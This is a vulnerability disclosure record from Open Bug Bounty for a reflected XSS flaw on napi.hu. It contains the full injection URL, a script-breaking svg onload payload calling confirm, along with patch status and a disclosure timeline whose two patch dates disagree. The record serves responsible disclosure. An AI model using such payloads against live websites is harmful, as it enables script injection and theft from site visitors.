napi.hu XSS vulnerability

2017-10-20T23:08:00
ID OBB:355895
Type openbugbounty
Reporter login_denied
Modified 2017-11-20T16:34:00

Description

Vulnerable URL:
http://www.napi.hu/?m=%3C/script%3E%3Csvg/onload%3Dconfirm(/OPENBUGBOUNTY/)%3E
Details:

Description| Value
---|---
Patched:| Yes, at 23.10.2017
Latest check for patch:| 23.10.2017 13:23 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 20802
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 20 October, 2017 23:08 GMT
Generic security notifications sent to website owner| 20 October, 2017 23:11 GMT
Vulnerability details disclosed by researcher| 19 November, 2017 23:21 GMT
Vulnerability patched by the website owner| 20 November, 2017 16:34 GMT